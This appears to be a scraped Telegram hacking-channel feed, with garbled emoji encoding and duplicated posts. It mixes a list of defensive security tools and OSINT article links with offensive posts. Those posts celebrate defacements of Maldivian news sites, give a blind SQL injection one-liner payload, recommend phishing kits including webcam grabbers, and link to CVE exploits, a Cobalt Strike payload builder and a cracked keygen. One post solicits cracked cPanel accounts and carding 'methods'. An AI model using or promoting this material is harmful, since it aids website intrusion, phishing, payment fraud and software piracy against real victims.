Forwarded from ใโ๐๐โขใ๐โคออออ๐บ๐
ฒ๐ฒโWhite Hatเฟ
INFORMATION DISCLOSURE AT NASA : HERE
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
๐๐๐๐๐ ๐๐๐๐๐๐๐๐ ๐๐๐๐ ๐๐๐๐๐๐ ๐๐๐๐๐
๐ฏ 1. Zeek: https://zeek.org/ Network Security Monitoring
๐ฏ 2. ClamAV: https://www.clamav.net/ Antivirus
๐ฏ 3. OpenVAS: https://www.openvas.org/ Vulnerability Scanner
๐ฏ 4. TheHive: https://lnkd.in/e7aVCRUZ Incident Response
๐ฏ 5. PFSense: https://www.pfsense.org/ Security appliance (firewall/VPN/router)
๐ฏ 6. Elastic: https://www.elastic.co/de/ Analytics
๐ฏ 7. Osquery: https://www.osquery.io/ Endpoint visibility
๐ฏ 8. Arkime: https://arkime.com/ Packet capture and search
๐ฏ 9. Wazuh: https://wazuh.com/ XDR and SIEM
๐ฏ 10. Alien Vault Ossim: https://lnkd.in/eShQt29h SIEM
๐ฏ 11. Velociraptor: https://lnkd.in/eYehEaNa Forensic and IR
๐ฏ 12. MISP project: https://lnkd.in/emaSrT57 Information sharing and Threat Intelligence
๐ฏ 13. Kali: https://www.kali.org/ Security OS
๐ฏ 14. Parrot: https://www.parrotsec.org/ Security OS
๐ฏ 15. OpenIAM: https://www.openiam.com/ IAM
๐ฏ 16. Yara: https://lnkd.in/eEJegEak Patterns
๐ฏ 17. Wireguard: https://www.wireguard.com/ VPN
๐ฏ 18. OSSEC: https://www.ossec.net/ HIDS
๐ฏ 19. Suricata: https://suricata.io/ IDS/IPS
๐ฏ 20. Shuffler: https://shuffler.io/ SOAR
๐ฏ 21. Phish Report: https://phish.report/ Anti Phishing
๐ฏ 22. Graylog: https://lnkd.in/eAFuUmuw Logmanagement
๐ฏ 23. Trivy: https://lnkd.in/e7JxXStY DevOps/IaC Scanning
๐ฏ 24. OpenEDR: https://openedr.com/ EDR
๐ฏ 25. Metasploit: https://lnkd.in/e4ECX-py Pentest
๐ฏ 26. NMAP: https://nmap.org/ Old but gold
Credits: Seyed Arshia Ahmadi
#cybersecurity #cybersecuritytools #opensource
๐ฏ 1. Zeek: https://zeek.org/ Network Security Monitoring
๐ฏ 2. ClamAV: https://www.clamav.net/ Antivirus
๐ฏ 3. OpenVAS: https://www.openvas.org/ Vulnerability Scanner
๐ฏ 4. TheHive: https://lnkd.in/e7aVCRUZ Incident Response
๐ฏ 5. PFSense: https://www.pfsense.org/ Security appliance (firewall/VPN/router)
๐ฏ 6. Elastic: https://www.elastic.co/de/ Analytics
๐ฏ 7. Osquery: https://www.osquery.io/ Endpoint visibility
๐ฏ 8. Arkime: https://arkime.com/ Packet capture and search
๐ฏ 9. Wazuh: https://wazuh.com/ XDR and SIEM
๐ฏ 10. Alien Vault Ossim: https://lnkd.in/eShQt29h SIEM
๐ฏ 11. Velociraptor: https://lnkd.in/eYehEaNa Forensic and IR
๐ฏ 12. MISP project: https://lnkd.in/emaSrT57 Information sharing and Threat Intelligence
๐ฏ 13. Kali: https://www.kali.org/ Security OS
๐ฏ 14. Parrot: https://www.parrotsec.org/ Security OS
๐ฏ 15. OpenIAM: https://www.openiam.com/ IAM
๐ฏ 16. Yara: https://lnkd.in/eEJegEak Patterns
๐ฏ 17. Wireguard: https://www.wireguard.com/ VPN
๐ฏ 18. OSSEC: https://www.ossec.net/ HIDS
๐ฏ 19. Suricata: https://suricata.io/ IDS/IPS
๐ฏ 20. Shuffler: https://shuffler.io/ SOAR
๐ฏ 21. Phish Report: https://phish.report/ Anti Phishing
๐ฏ 22. Graylog: https://lnkd.in/eAFuUmuw Logmanagement
๐ฏ 23. Trivy: https://lnkd.in/e7JxXStY DevOps/IaC Scanning
๐ฏ 24. OpenEDR: https://openedr.com/ EDR
๐ฏ 25. Metasploit: https://lnkd.in/e4ECX-py Pentest
๐ฏ 26. NMAP: https://nmap.org/ Old but gold
Credits: Seyed Arshia Ahmadi
#cybersecurity #cybersecuritytools #opensource
Zeek
The Zeek Network Security Monitor
Zeek (formerly Bro) is the worldโs leading platform for network security monitoring. Flexible, open source, and powered by defenders.
Anyone Know Any Cybersecurity Related Webui Panel Based Tools Plz Drop In my dm @mynk0x00 I will host it on system32.in on vps
Forwarded from ฤฑllฤฑll โข TeAm UcC OpErAtIoNs โข ฤฑllฤฑll
Media is too big
VIEW IN TELEGRAM
๐ฅ Maldives Business Times Official Website Hacked By Team UCC ๐ฅ
โ ๐ฒ๐ป SITE :- https://mbt.mv/
โ ๐ฒ๐ป POC :- https://ownzyou.com/zone/198537
This is Just A Demo Of Our Attacks We Can Do More Better If Your Government Wants ๐พ !!
#WeAreIndiansHackers
#TEAM_ANON_101 #TEAM_UCC #TEAM_ICP #AnonymousIndia #UnknownCyberCult #Indian_Cyber_Punk #TeamNwh #All_Indian_Hackers #Network_Nine #Black_Dragon_Sec #DarkCyberWarrior #GlorySec
โ๏ธโค @UCC_TEAM โคโ๏ธ
โ ๐ฒ๐ป SITE :- https://mbt.mv/
โ ๐ฒ๐ป POC :- https://ownzyou.com/zone/198537
This is Just A Demo Of Our Attacks We Can Do More Better If Your Government Wants ๐พ !!
#WeAreIndiansHackers
#TEAM_ANON_101 #TEAM_UCC #TEAM_ICP #AnonymousIndia #UnknownCyberCult #Indian_Cyber_Punk #TeamNwh #All_Indian_Hackers #Network_Nine #Black_Dragon_Sec #DarkCyberWarrior #GlorySec
โ๏ธโค @UCC_TEAM โคโ๏ธ
https://system32.ink/android-privilege-escalation-cve-2023-48418-exploit/
Android Privilege Escalation CVE-2023-48418 Exploit
Forwarded from Cybertix
๐ง๐ถ๐บ๐ฒ ๐ฏ๐ฎ๐๐ฒ๐ฑ ๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ข๐ป๐ฒ๐น๐ถ๐ป๐ฒ๐ฟ๐
๐๐๐ฃ๐ : https://twitter.com/thecybertix/status/1745315492775206916?t=oDRYhmHGD4YkEYDCJdrGBw&s=19
๐๐๐ฃ๐ : https://twitter.com/thecybertix/status/1745315492775206916?t=oDRYhmHGD4YkEYDCJdrGBw&s=19
X (formerly Twitter)
Cybertix (@thecybertix) on X
๐ง๐ถ๐บ๐ฒ ๐ฏ๐ฎ๐๐ฒ๐ฑ ๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ข๐ป๐ฒ๐น๐ถ๐ป๐ฒ๐ฟ
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
Access Oneliners from Github:
https://t.co/Lv5AeEDSFl
Subscribe to our YouTube Channel:
https://t.co/xXKr0Ma4jZ
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
Access Oneliners from Github:
https://t.co/Lv5AeEDSFl
Subscribe to our YouTube Channel:
https://t.co/xXKr0Ma4jZ
๐2
Forwarded from OSINT AMBITION (Dheeraj Yadav)
New Article in OSINT Ambition Publication
2 ways to find the full email of a place on Google Maps
One more amazing writeup by @cybdetective
https://publication.osintambition.org/2-ways-to-find-the-full-email-of-a-place-on-google-maps-b441458bb467
Join @osintambition for more.
#osint #opsec #infosec #cybersec #geoint #privacy #Geolocation #AI
2 ways to find the full email of a place on Google Maps
One more amazing writeup by @cybdetective
https://publication.osintambition.org/2-ways-to-find-the-full-email-of-a-place-on-google-maps-b441458bb467
Join @osintambition for more.
#osint #opsec #infosec #cybersec #geoint #privacy #Geolocation #AI
Medium
2 ways to find the full email of a place on Google Maps
A few days ago, Pangar Ban (https://twitter.com/BanPangar) published a method for finding the part of email for a place on Google Maps.
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ๐ฉ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
โ๏ธ TOP 10 PHISHING TOOLS TO USE IN 2024
Setoolkit -
https://github.com/trustedsec/social-engineer-toolkit
SocialFish -
https://github.com/UndeadSec/SocialFish
HiddenEye -
https://github.com/DarkSecDevelopers/HiddenEye-Legacy
Evilginx2 -
https://github.com/kgretzky/evilginx
SeeYou - (Get Location using phishing attack) -
https://github.com/Viralmaniar/I-See-You
SayCheese - (Grab target's Webcam Shots) -
https://github.com/hangetzzu/saycheese
QR Code Jacking -
https://github.com/cryptedwolf/ohmyqr
ShellPhish -
https://github.com/An0nUD4Y/shellphish
BlackPhish -
https://github.com/iinc0gnit0/BlackPhish
โก๏ธ Give Reactions for More Such Content ๐ค
Setoolkit -
https://github.com/trustedsec/social-engineer-toolkit
SocialFish -
https://github.com/UndeadSec/SocialFish
HiddenEye -
https://github.com/DarkSecDevelopers/HiddenEye-Legacy
Evilginx2 -
https://github.com/kgretzky/evilginx
SeeYou - (Get Location using phishing attack) -
https://github.com/Viralmaniar/I-See-You
SayCheese - (Grab target's Webcam Shots) -
https://github.com/hangetzzu/saycheese
QR Code Jacking -
https://github.com/cryptedwolf/ohmyqr
ShellPhish -
https://github.com/An0nUD4Y/shellphish
BlackPhish -
https://github.com/iinc0gnit0/BlackPhish
โก๏ธ Give Reactions for More Such Content ๐ค
๐3
https://system32.ink/payload-generator-automate-payload-building-in-cobalt-strike/
Payload-Generator - Automate Payload Building in Cobalt Strike
https://system32.ink/cve-2023-36003-windows-lpe-xaml-diagnostics-api-exploit/
CVE-2023-36003 (Windows LPE XAML diagnostics API) Exploit
https://system32.ink/positive-technologies-network-attack-discovery-crack-v11-keygen/
Positive Technologies Network Attack Discovery Crack v11 Keygen
System32
Visual Studio Elevation of Privilege CVE-2024-20656 Exploit
Exploits And POCs
https://system32.ink/visual-studio-elevation-of-privilege-cve-2024-20656-exploit
Visual Studio Elevation of Privilege CVE-2024-20656 Exploit
https://system32.ink/gitlab-account-takeover-via-password-reset-cve-2023-7028-poc
Gitlab Account Takeover via Password Reset CVE-2023-7028 PoC
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Sync Contacts: A un-noticed goldmine of OSINT
https://publication.osintambition.org/sync-contacts-a-un-noticed-goldmine-of-osint-8159c3d89c4c
Join @osintambition for more.
#osint #opsec #infosec #cybersec #privacy #synccontacts #phoneosint
https://publication.osintambition.org/sync-contacts-a-un-noticed-goldmine-of-osint-8159c3d89c4c
Join @osintambition for more.
#osint #opsec #infosec #cybersec #privacy #synccontacts #phoneosint
Medium
Sync Contacts: A un-noticed goldmine of OSINT
Have you ever thought that is it safe to give your phone number to any unknown/untrusted person for comfort of a few seconds? Have youโฆ
Hello Guys wait is over and new version of Subdominator is released which is now better than previous versions and other tools now you can update or install the Subdominator's latest version and find the secret domains which
are in dept by using subdominator for more information you can visit: https://github.com/sanjai-AK47/Subdominator
are in dept by using subdominator for more information you can visit: https://github.com/sanjai-AK47/Subdominator
GitHub
GitHub - RevoltSecurities/Subdominator: SubDominator helps you discover subdomains associated with a target domain efficientlyโฆ
SubDominator helps you discover subdomains associated with a target domain efficiently and with minimal impact for your Bug Bounty - RevoltSecurities/Subdominator
ANYONE WITH CRACKED CPANEL OR DOMAIN ACCOUNTS WITH DOMAIN LINKED ?
TAKE
AWS
NEW DOMAINS
HOSTING
VPS
RDP
KEYS SOFTWARES
ADYEN METH
STRIPE METH
CHECKOUT METH
DM @CATH3R
TAKE
AWS
NEW DOMAINS
HOSTING
VPS
RDP
KEYS SOFTWARES
ADYEN METH
STRIPE METH
CHECKOUT METH
DM @CATH3R
๐2
https://crackcodes.in/pialert-network-security-scanner-notification-framework/
PiAlert - Network security scanner & notification framework
๐2
Forwarded from DemonSec
Hoara Online | News, Politics, Stories of Maldives
threat actor: M4D_GH057 (REXX)
https://hoara.mv/
https://mirror-h.org/zone/5575047/
Supp!! Maldives
#Indianhackers
>> Team DemonSec
threat actor: M4D_GH057 (REXX)
https://hoara.mv/
https://mirror-h.org/zone/5575047/
Supp!! Maldives
#Indianhackers
>> Team DemonSec
๐2๐พ1